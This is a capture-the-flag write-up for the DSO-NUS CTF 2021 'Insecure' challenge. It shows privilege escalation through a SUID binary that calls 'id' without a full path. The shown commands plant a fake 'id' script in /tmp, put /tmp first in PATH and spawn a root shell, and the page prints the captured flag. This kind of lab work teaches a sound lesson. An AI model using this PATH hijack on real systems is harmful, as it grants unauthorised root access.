Insecure (100)

Privilege escalation through SUID files and PATH variable manipulation

Problem

Someone once told me that SUID is a bad idea. Could you show me why?

Solution

The binary calls the id command three times, first without privileges, then as root, then again without privileges.

Since the SUID flag is set, we can manipulate the PATH variable to execute arbitrary code when id is called. The goal is to read the flag.txt file which requires root access. Thus, we need to spawn a shell as root.

The following bash script will only spawn the shell if the caller is root.

if [ `/bin/id -u` = "0" ]; then 
    echo "I am root" && /bin/bash
else 
    echo "I am not root"
fi

Translating this into a one liner and creating our malicious id payload:

$ echo "if [ \`/bin/id -u\` = \"0\" ]; then echo \"I am root\" && /bin/bash; else echo \"I am not root\"; fi" > id

PATH variable manipulation:

$ cd /tmp
$ echo "if [ \`/bin/id -u\` = \"0\" ]; then echo \"I am root\" && /bin/bash; else echo \"I am not root\"; fi" > id
$ chmod 777 id
$ export PATH=/tmp:$PATH

After running insecure, we obtain a root shell:

I am not root
I am root

$ cat /flag.txt
DSO-NUS{b4fcfe57b8d2b05ff3310c663a0497b1026cf039baeee18669957152cdc276da}

PreviousDSO-NUS CTF 2021 NextEasy SQL (200)

Last updated 1 year ago